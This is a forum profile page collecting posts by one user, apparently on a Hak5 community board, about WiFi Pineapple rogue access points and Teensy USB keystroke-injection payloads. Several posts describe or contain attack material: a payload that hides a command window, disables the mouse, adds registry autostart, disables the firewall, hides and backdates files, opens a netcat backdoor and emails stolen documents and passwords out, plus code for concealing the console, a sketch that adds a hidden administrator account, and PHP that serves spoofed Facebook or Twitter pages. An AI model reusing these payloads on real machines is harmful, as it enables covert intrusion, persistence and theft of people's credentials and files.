Vile
-
Posts
18 -
Joined
-
Last visited
Posts posted by Vile
-
-
Awesome work!
I just decided to order and upgrade to the Mark IV.
Can't wait to play around with it more.
-
That was a disclaimer / joke.
-
You can just use require('file.htm'); inside of an index.php
here's my setup:
index.php:
<?php $hhost = $_SERVER['HTTP_HOST']; if (strstr($hhost, "facebook.com")) require('facebook.htm'); elseif (strstr($hhost, "twitter.com")) require('twitter.htm'); ?>Then it's just a matter of modifying the htm files to load the css/image files from ./twitterfiles/ subfolders or what have you.
It makes it more clean to have the files in subfolders and to not have to rely on senseless redirecting. The referrer page will still be held in the HTTP_HOST environment variable.
(Of course this is just a hypothetical, no one would really want to use a jasager with facebook.com or twitter.com, that's just silly)
-
Just for the hell of it I tried reinstall dsniff ipk package and it's still the same problem.
@Darren does urlsnarf work on your 2100 ?
... This doesn't really make sense to me though because I can run plain ngrep and can see packets. There's no way urlsnarf uses more resources than ngrep, right?
-
@Vile,
It reboots the 2200? That sounds odd. While the OM1P does have more resources, it should run just fine. Could you let the router run for a while and see if it reboots on its own?
If it does not, can you see if all features make the 2200 reboot? If so, could you start the services manually and see if you get any errors or if it crashes immediately?
Yeah it did it before then I updated to the more recent version of your firmware and it does the same. It pretty much reboots it immediately after i run run urlsnarf -i br-lan.
It does stay up for a long time without running urlsnarf. I'll see if any other features cause it to reboot now
edit:
ran ./dnsspoof.sh & (OK) added ./ngrep.sh & and it rebooted..
tried again and it worked with dnsspoof / ngrep / karma on and "free" showed 876kb free (I assume that's kb, right?)
Still as soon as i run urlsnarf it resets immediately.
-
URL snarfer and other features seems to reboot the 2200. Is it a resources issue? Does MK3 have more memory/cpu power or something?
-
This worked for me too on Fon2200
Thanks
-
Added new version v0.2
I added a similar Document / password stealer as the original HakSaw. It uses the gmail method (with stunnel, etc). Currently the docu/pass stealer doesn't work with OS's using UAC (Win7/Vista). I'll think of a way to fix that soon. The rest should work with 7/Vista though.
Changes: [ version 0.2 ] + Added document / password recovery + sending thru email using gmail method (Doesnt work well with vista/7 if they have UAC on.. dont bother if you plan on using it against that. the stunnel.exe wont start the service thus no emails will be sent) + changed the default port netcat listens on to port 5555 + devcon mouse disabling only works for Win XP/ 2000 / 2003 .. I disabled it for the other OS's
-
That is very cool!! :) Do you have any features that can search for a particular file or document and have it sent of to an email? I'm working on a small project that requires me to get Teensy to look for a file and then send it off. However, I'm not sure how to do that. I saw Serial.read() could be a way to 'read' for the file names but i'm not very confident in that. Do you have any suggestions? Thanks for posting your project on here, it will help me learn more about what Teensy is capable of doing. :)
Bits1
Yeah it could be done the way the original HakSaw used Blat.exe But you'd need to set up a 'sender' email (through like gmail) to use to send the documents to your real email. So you'd have to set up a fake account on google or another site that has a SMTP server to use as the sender account.
You could have some code at the bottom of the code (before the exit command)
... just get the newer version ...
That's just an example though. It would depend on what you wanted, and you'd need to also download stunnel program if you planned on using a gmail account to send the emails ( look at hak5's HakSaw code to understand what it would need to do..). I could probably write the code to put in for you if you ... knew you wanted to use the google method and made an account for the 'sender' account on gmail or any other server that has an smtp server, etc
-
DukSaws 0.2 (pronounced DuckSauce)
Uses Psychosis's PsyDuk Framework v0.3 http://www.hak5.org/projects/doku.php?id=psyduk
and the WinAVR C compiler (find link at psyduk page)
(Requires: Psyduk v0.3 + WinAVR + Teensy Loader)
What it does:
1. Creates small command prompt that isn't readable 2. Moves the command prompt off the screen 3. Downloads ncFTPget & ncFTPput command line tools for easy ftp download&uploads in one command 4. Uses a tool called devcon.exe for disabling mouse devices while it does its thing (only on Windows OS's <Vista (not sure why it doesnt work on Vista/7)) 5. Adds Autostart for our payload to registry 6. Clears the 'recently run commands' from start menu 7. Creates batch file that gets run on startup.. disables firewall, sets created file-times of all files to an old date + sets hidden and readonly, starts netcat on port 5555 8. lets you add additional code.. gives you options of downloading&using (netcat, ncftpget, ncftpput, pkzipc, wget, all the password stealing commands from nirsoft (that people used for the Haksaw), nirsoft mylastsearch (search results), firefox's autocomplete, (or whatever you want since you have access to ncftp & wget) ) for your custom code. 9. Documents / Password stealer + emails you it compressed as zip file (Not working correctly with UAC on 7/vista)
read the readme
-
Also you could add this code (Only if you use psychosis's PsyDuk framework) :
void PDMoveOffScreen(uint8_t amountOfMoves) { PDKeypressWithModifier(KEY_SPACE, KEY_ALT); PDDelay(10); PDTypeString(PSTR("M")); PDDelay(10); PDKeypressRepeated_Alt(KEY_LEFT,amountOfMoves); PDDelay(10); PDKeypress(KEY_ENTER); } void PDKeypressRepeated_Alt(uint8_t key, uint8_t amountOfTimes) { for(uint8_t i=0; i < amountOfTimes; i++) { PDKeypress(key); PDDelay(2); } }Then in your Main() function after calling the cmd.exe use:
PDMoveOffScreen(50);
The only problem is if they move their mouse while it is moving.. they can essentially just drag the window back. In my code i use devcon.exe to disable the mouse device while it is moving & reenable it once the commands are finished.
-
instead of Win+R and running "Cmd"
you should run
cmd /Q /D /T:7F /F:OFF /V:OFF /K "@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls"
(Or if you're like me & you use Psychosis's PsyDuk Framework you can replace the PDOpenWindowsTerminal() in your code with this instead:
PDRunWindowsCommand(PSTR("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\" "));What it does is: It disables the registry reads cmd.exe runs on start which might slow it down, it turns autocompletion off, changes the background/foreground text color to grey on white which is hard to read and not as easily recognizable as an msdos command box, It also runs cmd.exe with the @echo off command, it uses mode.exe to change the msdos window to have low typing delay from the keyboard and it uses mode once again to change the window size of the msdos box to a small window that is only 1 command line length in height. the last commands it runs are titlebar "." to change it to just an empty titlebar (You could change it to something else, Windows Update for example) .. and then it runs 'cls' to clear the buffer.
-
That's building on 0.1, not 0.2 :P
I'll try add \n to the Ascii->Keystroke function, PDTypeChar later today.
Edit: Looking at the .zip from the wiki, it appears that I uploaded 0.1 as 0.2.
I'll upload 0.2 later today as well, with \n support.Ohh. Yea I was wondering about that..
Here's some changes to my code. I might call it DukSauce or something when I am done. Of course I will give you credit since I used your framework, maybe Psyduk: DukSauce.
old code.. Currently fixing it to work with psyduk0.2.1
-
Added this onto Psychosis's PsyDuk Framework v0.2
**** For Windows
Replace your old main() function in his PsyDuk.c with this:
old code
I might change the 'autostart' method to just use the "sc create" command to create a new service for the ducky.bat instead of relying on the .vbs method to run the bat hidden. Also: i'm aware nc.exe is detected by some A/V. The code snippet could be changed to launch something other than nc.exe or use an encoded version that isnt detected.
Psychosis: Can you add typeStringEnter to your ultility.c (I could do it, but it would probably be good built in)
Edit:
(5/2/10) Added NircCMD download to set the files created/modified times as older dates
-
Hi Everyone
Just wanted to share my first ducky code. It's similar to others that have been posted, but the keypress functions are modular and the ExecuteCommandViaRunWindow function gives you the option to minimise the executed program's window after it has been created. Simply specify 1 for the minimiseWindow argument, and 0 if you are executing something like notepad.exe which you don't want minimised.
The current payload creates a new user for windows named "DuckyWasHere" and adds it to the administrator group. Run "net user DuckyWasHere /delete" in command prompt to delete this account.
The delay values can probably be reduced; I have been testing on a low-spec desktop.
/* Modular ducky code with windows minimising by w02057. Based on code by Irongeek. */ //***pin definitions*** int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); } void loop() { delay(4000); digitalWrite(ledPin, HIGH); //turn on indicator LED ExecuteCommandViaRunWindow("cmd.exe", 0); //open cmd delay(1000); ExecuteCommand("net user DuckyWasHere quackquack /add"); //type out 1st command ExecuteCommand("net localgroup Administrators DuckyWasHere /add"); //type out 2nd command ExecuteCommand("exit"); //exit cmd digitalWrite(ledPin, LOW); //turn off indicator LED while(1); //halt code } void ExecuteCommand(char *command) { Keyboard.print(command); delay(10); PressAndRelease(KEY_ENTER, 1); delay(100); } void ExecuteCommandViaRunWindow(char *command, int minimiseWindow) { PressAndReleaseWithModifier(MODIFIERKEY_GUI, KEY_R); //open run command window delay(100); //delay to wait for run window to appear //***type command into run window and press enter*** ExecuteCommand(command); //***minimise executed command window if minimiseWindow is set*** if(minimiseWindow == 1) { delay(1000); PressAndReleaseWithModifier(MODIFIERKEY_ALT, KEY_SPACE); PressAndRelease(KEY_DOWN, 3); PressAndRelease(KEY_ENTER, 1); } } void PressAndRelease(int keyCode, int keyCount) { int keyCounter=0; for(keyCounter=0; keyCounter<keyCount; keyCounter++) { Keyboard.set_key1(keyCode); Keyboard.send_now(); delay(10); Keyboard.set_key1(0); Keyboard.send_now(); delay(10); } } void PressAndReleaseWithModifier(int modifierKey, int keyCode) { Keyboard.set_modifier(modifierKey); Keyboard.set_key1(keyCode); Keyboard.send_now(); delay(10); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(10); }I hope this can help people who are struggling to get going on this project. This is my first attempt at writing code for the Teensy, the key functions should be all that is needed for key-based payloads.
Based on code by IronGeek
Any comments or suggestions would be appreciated.
Thanks,
David
Doing alt-space and just hitting "n" will minimize it without having to do all those arrow keys.
But again, This minimize thing would be useless for the actual part that eats up most of the time (the ducky actually typing the commands out, which wouldnt work if its minimized...) I doubt the commands they end up calling will take long enough time that requires it minimized, just the typing of the commands takes the longest
-
I think i may need some help also..
Ive got my fon connected to my laptop which has a wireless card which is connecting to my main router/internet
The wireless card to internet is ICS'd its ip is 192.168.2.10
the wired ethernet adapter to the fon is 10.10.10.123
the fon is 10.10.10.1
I set the fon's gateway to 10.10.10.123 in its webif (it is in static IP mode.. is that not correct?)
It seems to be working somewhat... I can ssh to the fon and ping websites and they respond, and can ping ips on my 192.168.2. network and they also respond.. can even wget websites and it is downloaded correctly.
I think my problem is with the tftpd dhcp server stuff. It assigns them an ip on the range of 192.168.2.20 and up fine
I have the 'DNS' and 'gateway' in tftpd dhcpd server settings set as 192.168.2.10 (the ICS'd wireless which goes to internet) (I think thats what im supposed to set it to??)
But when i try to connect to the fon (testing using my NintendoDS) .. it assigns the ip and all that.. but internet doesnt seem to work (even though i can ping off the fon)
Any suggestions?
I'll upload 0.2 later today as well, with \n support.
Full Sslstrip Guide
in WiFi Pineapple Mark IV
Posted
I get this when I try to run it:
dies after that
any ideas?